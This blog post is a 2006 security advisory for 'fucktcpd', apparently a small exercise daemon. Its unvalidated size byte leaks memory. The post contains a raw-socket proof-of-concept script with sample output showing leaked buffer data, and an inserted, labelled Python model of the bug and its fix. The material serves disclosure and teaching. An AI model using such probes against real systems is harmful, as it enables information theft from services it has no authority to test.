-atlas wandering-
Bloggorama for breaking things

Thu, 06 Jul 2006

Security Advisory: fucktcpd information disclosure vulnerability

Advisory: 2006-atlas-001
Affected Software: fucktcpd
Affected Versions: all
Main Developer: invisigoth
Risk Rating: Moderate
Remotely Exploitable: Yes
Locally Exploitable: Yes
Release Date: 2006-07-06

Description:
------------
fucktcpd is a not quite popular checksumming form of echo. The key feature of fucktcpd is that it does not use TCP or UDP, but rather the CHAOS/IP protocol.

Vulnerability:
--------------
fucktcpd uses a simple protocol. It expects a string of data using protocol 16 (CHAOS). The third byte of the packet payload indicates the size of the data being handed in. Because the buffer used is 0x1000 in size, and a single-byte size variable can only indicate up to 256 bytes, no buffer is overflowed. The resulting heap allocation and memory copying adhere to acceptable bounds checking, at least with regard to buffer overflows.

However, the size byte is not validated against the actual input size, which makes information disclosure possible.
For example, if a packet is handed in that contains only the first three bytes of payload but carries a size byte of 0xff (255), arbitrary memory is accessed, copied, checksummed, and sent back to the attacker. If sensitive data was previously sent to the fucktcpd service, that data may be returned to the attacker.
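The following is an added illustration, not code from the advisory or from fucktcpd itself. It models the bug in pure Python: a daemon that reuses one 0x1000-byte receive buffer and trusts the size byte, beside a handler that only ever reads the bytes that actually arrived. The checksum routine, the exact meaning of the size byte (bytes following the 3-byte header), and the buffer-reuse model are assumptions made for the example; the real daemon's internals are not on the page.

```python
import struct

HEADER_LEN = 3      # the advisory: the third payload byte is the size byte
BUF_SIZE = 0x1000   # receive-buffer size stated in the advisory


def checksum16(data: bytes) -> int:
    """Ones'-complement 16-bit sum (assumed checksum; the real one is not on the page)."""
    total = 0
    for i in range(0, len(data), 2):
        total += int.from_bytes(data[i:i + 2].ljust(2, b"\x00"), "big")
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


class VulnerableEcho:
    """Models the behaviour the advisory describes: the size byte is trusted,
    so a three-byte packet with size 0xff returns 255 bytes of whatever earlier
    clients left behind in the reused receive buffer."""

    def __init__(self) -> None:
        self.buf = bytearray(BUF_SIZE)  # one buffer for the life of the daemon, never cleared

    def handle(self, payload: bytes) -> bytes:
        self.buf[:len(payload)] = payload                      # copy only what arrived
        size = self.buf[2]                                     # declared length, never checked
        body = bytes(self.buf[HEADER_LEN:HEADER_LEN + size])   # may run past the real input
        return struct.pack("!H", checksum16(body)) + body


class FixedEcho:
    """Same protocol, but the declared size must equal the bytes actually
    received, and only those bytes are ever read or echoed."""

    def handle(self, payload: bytes) -> bytes:
        if len(payload) < HEADER_LEN:
            raise ValueError("packet shorter than the 3-byte header")
        size = payload[2]
        received = len(payload) - HEADER_LEN
        if size != received:
            raise ValueError(f"size byte {size} does not match {received} bytes received")
        body = payload[HEADER_LEN:HEADER_LEN + size]           # bounded by the packet itself
        return struct.pack("!H", checksum16(body)) + body


def packet(body: bytes) -> bytes:
    """Build a well-formed request: two reserved bytes, the size byte, then the body."""
    if len(body) > 0xFF:
        raise ValueError("body too long for a one-byte size field")
    return b"\x00\x00" + bytes([len(body)]) + body


PROBE = b"\x00\x00\xff"   # the advisory's request: a 3-byte packet claiming 255 bytes


def demo():
    """Constructed scenario: a legitimate client echoes a secret, then the probe arrives."""
    secret = b"secret-token-1234"
    vuln, fixed = VulnerableEcho(), FixedEcho()
    vuln.handle(packet(secret))
    fixed.handle(packet(secret))
    leaked = vuln.handle(PROBE)        # 2-byte checksum + 255 bytes of stale buffer
    try:
        fixed.handle(PROBE)
        rejected = None
    except ValueError as exc:
        rejected = str(exc)
    return leaked, rejected


if __name__ == "__main__":
    leaked, rejected = demo()
    print(f"vulnerable daemon returned {len(leaked)} bytes; "
          f"contains earlier client's secret: {b'secret-token' in leaked}")
    print(f"fixed daemon: {rejected}")
```

The defensive point is the one the advisory makes implicitly: a length field inside the packet is attacker-controlled data, so the copy must be bounded by the number of bytes the kernel actually delivered, not by what the packet claims. Clearing or never reusing the receive buffer between requests is a second, independent layer that limits what a length bug of this kind can expose.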

Example:
--------
#!/usr/bin/env python3
# Original proof of concept, updated to Python 3 syntax (print calls, bytes literal);
# the behaviour is unchanged. Requires root for the raw socket.

from socket import socket, AF_INET, SOCK_RAW, getprotobyname
import sys

# Raw socket speaking IP protocol 16 (CHAOS); the kernel prepends the IP header.
sock = socket(AF_INET, SOCK_RAW, getprotobyname("chaos"))


def send(host, data):
    # Port is meaningless for a raw socket, hence 0.
    sock.sendto(data, (host, 0))


def recv():
    # The reply includes the IP header, so it is longer than the echoed payload.
    data, sender = sock.recvfrom(2000)
    print("got %d bytes from %s" % (len(data), repr(sender)))
    print("DATA: %s" % (repr(data)))


# Three-byte payload: two leading bytes, then a size byte of 0xff (255).
exploit = b"\x00\x00\xff"
send(sys.argv[1], exploit)
recv()



$ sudo ./fyou-fucktcpd.py 192.168.255.128
Password:
got 278 bytes from ('192.168.255.128', 32756)
DATA: 'E\x00\x01\x16\x00v\x00\x00@\x10\xf9\x8e\xc0\xa8\xff\x80\xc0\xa8\xff\x01\x01\xe2\xffaA0aA1aA2aA3aA4aA5aA6aA7aA8aA9aB0aB1aB2aB3
aB4aB5aB6aB7aB8aB9aC0aC1aC2aC3aC4aC5aC6aC7aC8aC9aD0aD1aD2aD3aD4aD5aD6aD7aD8aD9aE0aE1aE2aE3aE4aE5aE6aE7aE8aE9aF0aF1aF2aF3aF4aF5aF6aF7
aF8aF9aG0aG1aG2aG3aG4aG5aG6aG7aG8aG9aH0aH1aH2aH3aH4aH5aH6aH7aH8aH9aI0aI1aI2aI3aI4'


Credits:
--------
atlas for his bull-headed stupidity
invisigoth for the enjoyable exercise
1@stPlace for putting up with atlas' continual rantings and detailed walkthrough of fucktcpd

http://atlas.r4780y.com/



